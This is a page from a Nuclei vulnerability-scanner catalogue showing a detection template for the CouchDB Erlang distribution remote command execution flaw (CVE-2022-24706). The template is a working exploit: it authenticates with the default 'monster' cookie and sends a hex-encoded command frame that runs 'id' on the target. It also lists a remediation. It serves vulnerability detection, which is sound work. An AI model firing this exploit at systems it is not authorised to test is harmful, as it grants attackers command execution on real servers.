Skip to content
Nuclei Templates

CouchDB Erlang Distribution - Remote Command Execution

ID: CVE-2022-24706

Severity: critical

Author: Mzack9999,pussycat0x

Tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp

Description

Section titled “Description”

In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.

YAML Source

Section titled “YAML Source”
id: CVE-2022-24706


info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    epss-score: 0.9748
    epss-percentile: 0.99964
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: apache
    product: couchdb
    shodan-query:
      - product:"CouchDB"
      - product:"couchdb"
      - cpe:"cpe:2.3:a:apache:couchdb"
  tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp
variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:9100"
    inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
# digest: 4b0a00483046022100c03841951808011c271a4014edfbd3e1eb311d55d61fdfc84f1e40f6211264ec022100acae6457d844905c59b507c345f13e672e1a493a685180424fb0dfcf27514e60:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "network/cves/2022/CVE-2022-24706.yaml"

View on Github